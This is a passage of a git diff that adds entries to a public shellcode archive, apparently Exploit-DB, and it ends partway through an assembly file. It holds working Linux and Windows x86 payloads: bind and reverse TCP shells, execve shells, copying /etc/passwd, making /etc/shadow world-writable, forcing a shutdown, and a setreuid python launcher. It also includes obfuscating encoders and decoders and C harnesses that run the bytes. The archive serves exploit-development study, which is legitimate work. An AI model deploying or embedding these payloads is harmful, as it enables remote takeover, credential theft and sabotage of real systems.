+    mov ecx,esp
+
+    mov al,0xb
+    int 0x80
+
+here:
+    call me
+    path db "//bin/sh"
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43750.asm b/shellcodes/linux_x86/43750.asm
new file mode 100644
index 000000000..0a0aa2f24
--- /dev/null
+++ b/shellcodes/linux_x86/43750.asm
@@ -0,0 +1,52 @@
+;Description:   Copy /etc/passwd to /tmp/outfile (97 bytes)
+;Shellcode:     \x31\xc0\xb0\x05\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x8d\x5c\x24\x01\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x66\x6a\xff\x5a\xcd\x80\x89\xc6\x6a\x05\x58\x31\xc9\x51\x68\x66\x69\x6c\x65\x68\x2f\x6f\x75\x74\x68\x2f\x74\x6d\x70\x89\xe3\xb1\x42\x66\x68\xa4\x01\x5a\xcd\x80\x89\xc3\x6a\x04\x58\x89\xf9\x89\xf2\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x05\xcd\x80
+;Author:        Paolo Stivanin <https://github.com/polslinux>
+;SLAE ID:       526 
+
+global _start
+section .text
+_start:
+    xor eax,eax
+    mov al,0x5
+    xor ecx,ecx
+    push ecx
+    push 0x64777373 
+    push 0x61702f63
+    push 0x74652f2f
+    lea ebx,[esp +1]
+    int 0x80
+
+    mov ebx,eax
+    mov al,0x3
+    mov edi,esp
+    mov ecx,edi
+    push WORD 0xffff
+    pop edx
+    int 0x80
+    mov esi,eax
+
+    push 0x5
+    pop eax
+    xor ecx,ecx
+    push ecx
+    push 0x656c6966
+    push 0x74756f2f
+    push 0x706d742f
+    mov ebx,esp
+    mov cl,0102o
+    push WORD 0644o
+    pop edx
+    int 0x80
+
+    mov ebx,eax
+    push 0x4
+    pop eax
+    mov ecx,edi
+    mov edx,esi
+    int 0x80
+
+    xor eax,eax
+    xor ebx,ebx
+    mov al,0x1
+    mov bl,0x5
+    int 0x80
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43751.asm b/shellcodes/linux_x86/43751.asm
new file mode 100644
index 000000000..332c78b3a
--- /dev/null
+++ b/shellcodes/linux_x86/43751.asm
@@ -0,0 +1,75 @@
+;author: Shihao Songss3695@drexel.edu
+;decoding will be divided into two parts
+;First, shift right to get the original shellcode with prefix "0xAA"
+;Second, delete all the "0xAA" prefix and reformat the shellcode
+
+; shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+; encode = ""
+; 
+; for x in bytearray(shellcode) :
+;     if x < 128:
+;         x=x<<1      
+;         encode += '0xAA,'
+;     encode += '0x'
+;     encode += '%02x,'%x
+; 
+; print encode
+
+global _start
+section .text
+_start:
+
+jmp short call_shellcode
+
+decoder:
+
+pop esi             ;now esi contains the address of encoded shellcode
+mov edi, esi        ;this is for formatting
+
+decode:
+mov bl, byte [esi]
+xor bl, 0xBB        ;bl is for testing end
+jz formatting       ;First step is done
+
+mov cl, byte [esi]
+xor cl, 0XAA
+jz shift_decode
+inc esi
+jmp short decode
+
+
+shift_decode:
+mov dl, byte [esi + 1]
+shr dl,1            ;shift next instruction
+mov byte [esi + 1], dl
+inc esi
+jmp short decode
+
+formatting:
+mov eax, edi
+mov bl, byte [eax]
+xor bl, 0xBB        ;now formatting complete
+jz encoded          ;starts to execute
+format:
+mov bl, byte [eax]  ;bl is for testing end
+mov cl, byte [eax]  ;cl is for testing prefix
+xor cl, 0xAA
+jnz Next_Cycle
+
+Cycle:
+mov dl, byte [eax]
+xor dl, 0xBB
+jz Next_Cycle       ;This cycle ends here
+mov dl, byte [eax + 1]
+mov byte [eax], dl
+inc eax
+jmp short Cycle
+
+Next_Cycle:
+inc edi
+jmp short formatting
+
+call_shellcode:
+
+call decoder
+encoded: db 0xAA,0x62,0xc0,0xAA,0xa0,0xAA,0xd0,0xAA,0x5e,0xAA,0x5e,0xAA,0xe6,0xAA,0xd0,0xAA,0xd0,0xAA,0x5e,0xAA,0xc4,0xAA,0xd2,0xAA,0xdc,0x89,0xe3,0xAA,0xa0,0x89,0xe2,0xAA,0xa6,0x89,0xe1,0xb0,0xAA,0x16,0xcd,0x80,0xBB
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43752.asm b/shellcodes/linux_x86/43752.asm
new file mode 100644
index 000000000..005716dfa
--- /dev/null
+++ b/shellcodes/linux_x86/43752.asm
@@ -0,0 +1,15 @@
+;Description:   JMP-FSTENV execve shell (67 bytes)
+;Shellcode:     \xd9\xee\xeb\x34\xeb\x25\x5e\x89\xf7\x31\xc0\x50\x89\xe2\x50\x83\xc4\x03\x8d\x76\x04\x33\x06\x50\x31\xc0\x33\x07\x50\x89\xe3\x31\xc0\x50\x8d\x3b\x57\x89\xe1\xb0\x0b\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x9b\xd9\x74\x24\xf4\x59\x8d\x41\x04\xff\xe0
+;Author:        Paolo Stivanin <https://github.com/polslinux>
+;SLAE ID:       526
+
+global main
+section .text
+main:
+    fldz
+    jmp short here
+message: db 0xeb,0x25,0x5e,0x89,0xf7,0x31,0xc0,0x50,0x89,0xe2,0x50,0x83,0xc4,0x03,0x8d,0x76,0x04,0x33,0x06,0x50,0x31,0xc0,0x33,0x07,0x50,0x89,0xe3,0x31,0xc0,0x50,0x8d,0x3b,0x57,0x89,0xe1,0xb0,0x0b,0xcd,0x80,0xe8,0xd6,0xff,0xff,0xff,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
+here:   fstenv [esp-0xc]
+    pop ecx
+    lea eax,[ecx+4]
+    jmp eax
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43753.c b/shellcodes/linux_x86/43753.c
new file mode 100644
index 000000000..752edcc2f
--- /dev/null
+++ b/shellcodes/linux_x86/43753.c
@@ -0,0 +1,48 @@
+/*
+; Title:    chmod 0777 /etc/shadow (a bit obfuscated) Shellcode - 51 Bytes
+; Platform: linux/x86
+; Date:     2014-06-22
+; Author:   Osanda Malith Jayathissa (@OsandaMalith)
+
+section .text
+global _start
+
+_start: 
+mov ebx, eax
+xor eax, ebx
+push dword eax
+mov esi, 0x563a1f3e
+add esi, 0x21354523
+mov dword [esp-4], esi
+mov dword [esp-8], 0x68732f2f
+mov dword [esp-12], 0x6374652f
+sub esp, 12
+mov    ebx,esp
+push word  0x1ff
+pop    cx
+mov    al,0xf
+int    0x80
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
+"\x3a\x56\x81\xc6\x23\x45\x35\x21"
+"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
+"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
+"\x2f\x65\x74\x63\x83\xec\x0c\x89"
+"\xe3\x66\x68\xff\x01\x66\x59\xb0"
+"\x0f\xcd\x80";
+
+int
+main() {
+
+       printf("Shellcode Length:  %d\n", strlen(code));
+       int (*ret)() = (int(*)())code;
+       ret();
+
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43754.c b/shellcodes/linux_x86/43754.c
new file mode 100644
index 000000000..6efd5e879
--- /dev/null
+++ b/shellcodes/linux_x86/43754.c
@@ -0,0 +1,54 @@
+/*
+; Title: shutdown -h now Shellcode - 56 bytes
+; Date: 2014-06-27
+; Platform: linux/x86
+; Author: Osanda Malith Jayathissa (@OsandaMalith)
+
+Disassembly of section .text:
+
+08048060 <_start>:
+8048060:    31 c0                   xor    eax,eax
+8048062:    31 d2                   xor    edx,edx
+8048064:    50                      push   eax
+8048065:    66 68 2d 68             pushw  0x682d
+8048069:    89 e7                   mov    edi,esp
+804806b:    50                      push   eax
+804806c:    6a 6e                   push   0x6e
+804806e:    66 c7 44 24 01 6f 77    mov    WORD PTR [esp+0x1],0x776f
+8048075:    89 e7                   mov    edi,esp
+8048077:    50                      push   eax
+8048078:    68 64 6f 77 6e          push   0x6e776f64
+804807d:    68 73 68 75 74          push   0x74756873
+8048082:    68 6e 2f 2f 2f          push   0x2f2f2f6e
+8048087:    68 2f 73 62 69          push   0x6962732f
+804808c:    89 e3                   mov    ebx,esp
+804808e:    52                      push   edx
+804808f:    56                      push   esi
+8048090:    57                      push   edi
+8048091:    53                      push   ebx
+8048092:    89 e1                   mov    ecx,esp
+8048094:    b0 0b                   mov    al,0xb
+8048096:    cd 80                   int    0x80
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] =  "\x31\xc0\x31\xd2\x50\x66\x68\x2d"
+"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
+"\x44\x24\x01\x6f\x77\x89\xe7\x50"
+"\x68\x64\x6f\x77\x6e\x68\x73\x68"
+"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
+"\x2f\x73\x62\x69\x89\xe3\x52\x56"
+"\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+int
+main() {
+
+printf("Shellcode Length:  %d\n", (int)strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43755.c b/shellcodes/linux_x86/43755.c
new file mode 100644
index 000000000..b90fc9b6a
--- /dev/null
+++ b/shellcodes/linux_x86/43755.c
@@ -0,0 +1,75 @@
+/* 
+*  Title:    Shell Bind TCP Shellcode Port 1337 - 89 bytes
+*  Platform: Linux/x86
+*  Date:     2014-07-13
+*  Author:   Julien Ahrens (@MrTuxracer)
+*  Website:  http://www.rcesecurity.com 
+*
+*  Disassembly of section .text:
+*  00000000 <_start>:
+*  0:   6a 66                push   0x66
+*  2:   58                   pop    eax
+*  3:   6a 01                push   0x1
+*  5:   5b                   pop    ebx
+*  6:   31 f6                xor    esi,esi
+*  8:   56                   push   esi
+*  9:   53                   push   ebx
+*  a:   6a 02                push   0x2
+*  c:   89 e1                mov    ecx,esp
+*  e:   cd 80                int    0x80
+* 10:   5f                   pop    edi
+* 11:   97                   xchg   edi,eax
+* 12:   93                   xchg   ebx,eax
+* 13:   b0 66                mov    al,0x66
+* 15:   56                   push   esi
+* 16:   66 68 05 39          pushw  0x3905
+* 1a:   66 53                push   bx
+* 1c:   89 e1                mov    ecx,esp
+* 1e:   6a 10                push   0x10
+* 20:   51                   push   ecx
+* 21:   57                   push   edi
+* 22:   89 e1                mov    ecx,esp
+* 24:   cd 80                int    0x80
+* 26:   b0 66                mov    al,0x66
+* 28:   b3 04                mov    bl,0x4
+* 2a:   56                   push   esi
+* 2b:   57                   push   edi
+* 2c:   89 e1                mov    ecx,esp
+* 2e:   cd 80                int    0x80
+* 30:   b0 66                mov    al,0x66
+* 32:   43                   inc    ebx
+* 33:   56                   push   esi
+* 34:   56                   push   esi
+* 35:   57                   push   edi
+* 36:   89 e1                mov    ecx,esp
+* 38:   cd 80                int    0x80
+* 3a:   59                   pop    ecx
+* 3b:   59                   pop    ecx
+* 3c:   b1 02                mov    cl,0x2
+* 3e:   93                   xchg   ebx,eax
+*
+* 0000003f <loop>:
+* 3f:   b0 3f                mov    al,0x3f
+* 41:   cd 80                int    0x80
+* 43:   49                   dec    ecx
+* 44:   79 f9                jns    3f <loop>
+* 46:   b0 0b                mov    al,0xb
+* 48:   68 2f 2f 73 68       push   0x68732f2f
+* 4d:   68 2f 62 69 6e       push   0x6e69622f
+* 52:   89 e3                mov    ebx,esp
+* 54:   41                   inc    ecx
+* 55:   89 ca                mov    edx,ecx
+* 57:   cd 80                int    0x80
+*/
+
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80";
+
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43756.c b/shellcodes/linux_x86/43756.c
new file mode 100644
index 000000000..7685456b7
--- /dev/null
+++ b/shellcodes/linux_x86/43756.c
@@ -0,0 +1,62 @@
+/* 
+*  Title:    Shell Reverse TCP Shellcode - 74 bytes
+*  Platform: Linux/x86
+*  Date:     2014-07-25
+*  Author:   Julien Ahrens (@MrTuxracer)
+*  Website:  http://www.rcesecurity.com 
+*
+* Disassembly of section .text:
+*  00000000 <_start>:
+*  0:   6a 66                push   0x66
+*  2:   58                   pop    eax
+*  3:   6a 01                push   0x1
+*  5:   5b                   pop    ebx
+*  6:   31 d2                xor    edx,edx
+*  8:   52                   push   edx
+*  9:   53                   push   ebx
+*  a:   6a 02                push   0x2
+*  c:   89 e1                mov    ecx,esp
+*  e:   cd 80                int    0x80
+* 10:   92                   xchg   edx,eax
+* 11:   b0 66                mov    al,0x66
+* 13:   68 7f 01 01 01       push   0x101017f <ip: 127.1.1.1
+* 18:   66 68 05 39          pushw  0x3905 <port: 1337
+* 1c:   43                   inc    ebx
+* 1d:   66 53                push   bx
+* 1f:   89 e1                mov    ecx,esp
+* 21:   6a 10                push   0x10
+* 23:   51                   push   ecx
+* 24:   52                   push   edx
+* 25:   89 e1                mov    ecx,esp
+* 27:   43                   inc    ebx
+* 28:   cd 80                int    0x80
+* 2a:   6a 02                push   0x2
+* 2c:   59                   pop    ecx
+* 2d:   87 da                xchg   edx,ebx
+*
+* 0000002f <loop>:
+* 2f:   b0 3f                mov    al,0x3f
+* 31:   cd 80                int    0x80
+* 33:   49                   dec    ecx
+* 34:   79 f9                jns    2f <loop>
+* 36:   b0 0b                mov    al,0xb
+* 38:   41                   inc    ecx
+* 39:   89 ca                mov    edx,ecx
+* 3b:   52                   push   edx
+* 3c:   68 2f 2f 73 68       push   0x68732f2f
+* 41:   68 2f 62 69 6e       push   0x6e69622f
+* 46:   89 e3                mov    ebx,esp
+* 48:   cd 80                int    0x80
+*/
+
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43757.c b/shellcodes/linux_x86/43757.c
new file mode 100644
index 000000000..f5dc52a0e
--- /dev/null
+++ b/shellcodes/linux_x86/43757.c
@@ -0,0 +1,51 @@
+# Title: Shellcode Linux x86 [54Bytes] Run /usr/bin/python | setreuid(),execve()
+# Date: 8/5/2014
+# Author: Ali Razmjoo
+# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
+
+/*
+Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
+Shellcode Linux x86 Run /usr/bin/python | setreuid(),execve()
+Shellcode Length: 54
+
+
+00000000 <_start>:
+   0:   31 c0                   xor    %eax,%eax
+   2:   b0 46                   mov    $0x46,%al
+   4:   31 db                   xor    %ebx,%ebx
+   6:   31 c9                   xor    %ecx,%ecx
+   8:   cd 80                   int    $0x80
+   a:   eb 16                   jmp    22 <last>
+0000000c <first>:
+   c:   5b                      pop    %ebx
+   d:   31 c0                   xor    %eax,%eax
+   f:   88 43 0f                mov    %al,0xf(%ebx)
+  12:   89 5b 10                mov    %ebx,0x10(%ebx)
+  15:   89 43 14                mov    %eax,0x14(%ebx)
+  18:   b0 0b                   mov    $0xb,%al
+  1a:   8d 4b 10                lea    0x10(%ebx),%ecx
+  1d:   8d 53 14                lea    0x14(%ebx),%edx
+  20:   cd 80                   int    $0x80
+00000022 <last>:
+  22:   e8 e5 ff ff ff          call   c <first>
+  27:   2f                      das
+  28:   75 73                   jne    9d <last+0x7b>
+  2a:   72 2f                   jb     5b <last+0x39>
+  2c:   62 69 6e                bound  %ebp,0x6e(%ecx)
+  2f:   2f                      das
+  30:   70 79                   jo     ab <last+0x89>
+  32:   74 68                   je     9c <last+0x7a>
+  34:   6f                      outsl  %ds:(%esi),(%dx)
+  35:   6e                      outsb  %ds:(%esi),(%dx)
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+char sc[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x0f\x89\x5b\x10\x89\x43\x14\xb0\x0b\x8d\x4b\x10\x8d\x53\x14\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e";
+
+int main(void)
+{
+    fprintf(stdout,"Length: %d\n\n",strlen(sc));
+    (*(void(*)()) sc)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43758.txt b/shellcodes/linux_x86/43758.txt
new file mode 100644
index 000000000..5c5d9c0fc
--- /dev/null
+++ b/shellcodes/linux_x86/43758.txt
@@ -0,0 +1,133 @@
+/*
+
+ ROT-7 Decoder Shellcode - Linux Intel/x86
+ Author: Stavros Metzidakis
+
+*/
+
+
+a) Python ROT-7 encoder for shellcode (execve-stack)
+---------------------------------------------------------------------------------------
+#!/usr/bin/python
+
+# Python ROT-7 Encoder
+
+shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+
+encoded = ""
+encoded2 = ""
+
+print 'Encoded shellcode ...'
+
+for x in bytearray(shellcode) :
+# boundary is computed as 255-ROT(x) where x, the amount to rotate by
+    if x > 248:
+        encoded += '\\x'
+        encoded += '%02x' %(7 -(256 - x))
+        encoded2 += '0x'
+        encoded2 += '%02x,' %(7 -(256 - x))
+    else:
+        encoded += '\\x'
+        encoded += '%02x'%(x+7)
+        encoded2 += '0x'
+        encoded2 += '%02x,' %(x+7)
+    
+
+print encoded
+
+print encoded2
+
+print 'Len: %d' % len(bytearray(shellcode))
+---------------------------------------------------------------------------------------
+Test run:
+$ ./rot-7-encoder.py
+Encoded shellcode ...
+\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87
+0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87,
+Len: 30
+
+
+
+
+b) Decoder for a ROT-7 encoded shellcode (execve-stack)
+---------------------------------------------------------------------------------------
+$objdump -d rot-7-decoder -M intel 
+
+rot-7-decoder:     file format elf32-i386
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:   eb 25                   jmp    8048087 <call_decoder>
+
+08048062 <decoder>:
+ 8048062:   5e                      pop    esi
+ 8048063:   31 c9                   xor    ecx,ecx
+ 8048065:   b1 1e                   mov    cl,0x1e              ;ROTed shellcode length goes here
+
+08048067 <decode>:
+ 8048067:   80 3e 07                cmp    BYTE PTR [esi],0x7
+ 804806a:   7c 05                   jl     8048071 <lowbound>
+ 804806c:   80 2e 07                sub    BYTE PTR [esi],0x7
+ 804806f:   eb 11                   jmp    8048082 <common_commands>
+
+08048071 <lowbound>:
+ 8048071:   31 db                   xor    ebx,ebx
+ 8048073:   31 d2                   xor    edx,edx
+ 8048075:   b3 07                   mov    bl,0x7
+ 8048077:   b2 ff                   mov    dl,0xff
+ 8048079:   66 42                   inc    dx
+ 804807b:   2a 1e                   sub    bl,BYTE PTR [esi]
+ 804807d:   66 29 da                sub    dx,bx
+ 8048080:   88 16                   mov    BYTE PTR [esi],dl
+
+08048082 <common_commands>:
+ 8048082:   46                      inc    esi
+ 8048083:   e2 e2                   loop   8048067 <decode>
+ 8048085:   eb 05                   jmp    804808c <Shellcode>
+
+08048087 <call_decoder>:
+ 8048087:   e8 d6 ff ff ff          call   8048062 <decoder>
+
+0804808c <Shellcode>:                               ;ROTed shellcode
+ 804808c:   38 c7                   cmp    bh,al
+ 804808e:   57                      push   edi
+ 804808f:   6f                      outs   dx,DWORD PTR ds:[esi]
+ 8048090:   69 68 7a 6f 6f 69 70    imul   ebp,DWORD PTR [eax+0x7a],0x70696f6f
+ 8048097:   75 36                   jne    80480cf <Shellcode+0x43>
+ 8048099:   6f                      outs   dx,DWORD PTR ds:[esi]
+ 804809a:   36                      ss
+ 804809b:   36                      ss
+ 804809c:   36                      ss
+ 804809d:   36                      ss
+ 804809e:   90                      nop
+ 804809f:   ea 57 90 e9 5a 90 e8    jmp    0xe890:0x5ae99057
+ 80480a6:   b7 12                   mov    bh,0x12
+ 80480a8:   d4 87                   aam    0x87
+---------------------------------------------------------------------------------------
+
+
+$ cat shellcode.c
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = "\xeb\x25\x5e\x31\xc9\xb1\x1e\x80\x3e\x07\x7c\x05\x80\x2e\x07\xeb\x11\x31\xdb\x31\xd2\xb3\x07\xb2\xff\x66\x42\x2a\x1e\x66\x29\xda\x88\x16\x46\xe2\xe2\xeb\x05\xe8\xd6\xff\xff\xff\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87";
+
+main()
+{
+
+    printf("Shellcode Length:  %d\n", strlen(code));
+
+    int (*ret)() = (int(*)())code;
+
+    ret();
+
+}
+
+
+$ gcc ./shellcode.c -fno-stack-protector -z execstack -o shellcode
+$ ./shellcode
+Shellcode Length:  74
+$
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43759.asm b/shellcodes/windows_x86/43759.asm
new file mode 100644
index 000000000..4c2242104
--- /dev/null
+++ b/shellcodes/windows_x86/43759.asm
@@ -0,0 +1,239 @@
+;      Title:  Win32 Bind Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;   Function:  Listen for connection and spawn command shell
+;     Author:  hdm[at]metasploit.com
+
+; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm
+
+
+[BITS 32]
+
+global _start
+
+_start:
+
+LCaller:
+    call LLoadFunctions
+
+LDataSegment:
+;========================
+
+dd "CMD"
+
+dd 0x79c679e7 ; closesocket             12
+dd 0x498649e5 ; accept                  16
+dd 0xe92eada4 ; listen                  20
+dd 0xc7701aa4 ; bind                    24
+dd 0xadf509d9 ; WSASocketA              28
+dd 0x3bfcedcb ; WSAStartup              32
+
+dd 0xec0e4e8e ; LoadLibraryA            36
+dd 0x73e2d87e ; ExitProcess             40
+dd 0xce05d9ad ; WaitForSingleObject     44
+dd 0x16b3fe72 ; CreateProcessA          48
+
+db "WS2_32.DLL", 0x00, 0x01
+;========================
+
+LLoadFunctions:	
+    pop ebx  
+    push esp
+	mov ebp, esp 
+    mov [ebp], ebx
+
+LKernel32Base:
+    push byte 0x30
+    pop ecx
+    mov eax, [fs:ecx]
+	mov eax, [eax + 0x0c] 
+	mov esi, [eax + 0x1c] 
+	lodsd				  
+	mov ebx, [eax + 0x08] 
+    jmp short LStartLoading
+
+LLoadWinsock:
+    lea edx, [edi + 44] ; get address of ws2_32.dll
+    push ecx            ; save counter
+    push edx            ; push address of ws2_32.dll
+	call eax            ; LoadLibraryA()
+    mov ebx, eax        ; save module handle 
+    pop ecx             ; restore counter
+    jmp short Looper2
+    
+LStartLoading:
+    ; Start loading addresses at ebp + 12
+    push byte 0x08
+    pop esi
+    add esi, ebp 
+
+    ; Function counter
+    push byte 0x0a
+    pop ecx
+    mov edi, [ebp]
+    
+Looper:
+    cmp cl, 0x06
+    je short LLoadWinsock
+
+Looper2:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx*4]    ; function hash value
+    call LGetProcAddress        ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+	xor edi, edi
+
+LWSAStartup:
+	; WSAStartup(0x101, DATA) 
+    sub sp, 400
+	push esp
+	push 0x101
+	call [ebp + 32]
+
+LWSASocketA:
+	; WSASocketA(2,1,0,0,0,0) 
+	push edi
+	push edi
+	push edi
+	push edi
+	inc edi
+	push edi
+	inc edi
+	push edi
+	call [ebp + 28]
+	mov ebx, eax                ; save socket to ebx
+    xor edi, edi
+    
+LBind:
+	push edi
+	push edi
+	push dword 0x11220002 ; port 8721
+	mov esi, esp
+	push byte 0x10        ; length
+	push esi
+	push ebx
+	call [ebp + 24]
+
+LListen:
+	push edi
+	push ebx
+	call [ebp + 20]
+
+LAccept:
+	push edi
+	push esi
+	push ebx
+	call [ebp + 16]
+	mov edx, eax
+
+LCreateProcessStructs:
+	; allocate space for STARTUPINFO, PROCESS_INFORMATION 
+	sub sp, 0x54
+
+	; zero out SI/PI 
+	lea edi, [esp]
+	xor eax, eax
+    push byte 21
+    pop ecx
+    
+LBZero:
+	rep stosd
+    
+    mov edi, edx
+	mov byte [esp + 16], 68	 ; si.cb = sizeof(si) 
+	inc byte [esp + 61]		 ; si.dwFlags = 0x100 
+
+	; socket handles 
+	mov [esp + 16 + 56], edi
+	mov [esp + 16 + 60], edi
+	mov [esp + 16 + 64], edi
+
+	lea eax, [esp + 16]	; si 
+	push esp			; pi 
+	push eax
+	push ecx
+	push ecx
+	push ecx
+    
+    inc ecx
+	push ecx
+    dec ecx
+    
+	push ecx
+	push ecx
+	push dword [ebp]
+	push ecx
+
+LCreateProcess:
+	call [ebp + 48]
+	mov ecx, esp
+    
+LWaitForSingleObject:
+    push 0xFFFFFFFF
+    push dword [ecx]
+    call [ebp + 44]
+
+LCloseSocket:
+    push edi
+    call [ebp + 12]
+
+LFinished:
+    call [ebp + 40]
+  
+LGetProcAddress:
+	push ebx
+	push ebp
+	push esi
+	push edi
+	mov ebp, [esp + 24]			
+	mov eax, [ebp + 0x3c]		
+	mov edx, [ebp + eax + 120]
+	add edx, ebp				
+	mov ecx, [edx + 24]			
+	mov ebx, [edx + 32]
+	add ebx, ebp
+
+LFnlp:
+
+	jecxz	LNtfnd
+	dec ecx
+	mov esi, [ebx + ecx * 4]
+	add esi, ebp				
+	xor edi, edi
+	cld
+
+LHshlp:
+
+	xor eax, eax
+	lodsb
+	cmp al, ah
+	je LFnd
+	ror edi, 13
+	add edi, eax
+	jmp short LHshlp
+
+LFnd:
+	
+	cmp edi, [esp + 20]
+	jnz LFnlp
+	mov ebx, [edx + 36]			
+	add ebx, ebp
+	mov cx, [ebx + 2 * ecx]		
+	mov ebx, [edx + 28]			
+	add ebx, ebp
+	mov eax, [ebx + 4 * ecx]	
+	add eax, ebp
+	jmp short LDone
+
+LNtfnd:
+	xor eax, eax
+
+LDone:
+	mov edx, ebp
+	pop edi
+	pop esi
+	pop ebp
+	pop ebx
+	ret 8
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43760.asm b/shellcodes/windows_x86/43760.asm
new file mode 100644
index 000000000..86a8659d6
--- /dev/null
+++ b/shellcodes/windows_x86/43760.asm
@@ -0,0 +1,135 @@
+;      Title:  Windows 2000 Vampiric Import Reverse Connect
+;  Platforms:  Windows 2000
+;   Function:  Attach to dbmssocn.dll, use IAT to connect, read/exec payload
+;     Author:  hdm[at]metasploit.com
+
+; Compile: nasm -f bin -o win2000_vampiric_connector.bin win2000_vampiric_connector.asm
+
+
+[BITS 32]
+
+%define ESIMOD add si, 0x3000
+%define DBMSSOCN_WSAStartup [esi + 0x6C]
+%define DBMSSOCN_connect    [esi + 0x4C]
+%define DBMSSOCN_recv       [esi + 0x54]
+%define DBMSSOCN_send       [esi + 0x5C]
+%define DBMSSOCN_socket     [esi + 0x74]
+
+; uncomment this for better error handling and persistent reconnects
+; %define NICE
+
+global _start
+_start:
+
+LKernel32Base:
+    push byte 0x30
+    pop ecx
+    mov eax, [fs:ecx]
+    mov eax, [eax + 0x0c] 
+    mov esi, [eax + 0x1c] 
+    lodsd				  
+    mov ebp, [eax + 0x08] 
+
+    mov eax, [ebp + 0x3c]           
+    mov edx, [ebp + eax + 120]
+    add edx, ebp                            
+    mov ecx, [edx + 24]                     
+    mov ebx, [edx + 32]
+    add ebx, ebp
+
+LFinderLoop:
+
+%ifdef NICE
+    jecxz LNotFound
+%endif
+
+    dec ecx
+    mov esi, [ebx + ecx * 4]
+    add esi, ebp                            
+    xor edi, edi    
+    cld
+
+LHasher:
+    xor eax, eax
+    lodsb
+    cmp al, ah
+    je short LFound
+    ror edi, 13
+    add edi, eax
+    jmp short LHasher
+
+LFound:      
+    cmp edi, 0xec0e4e8e     ; LoadLibraryA
+    jnz short LFinderLoop
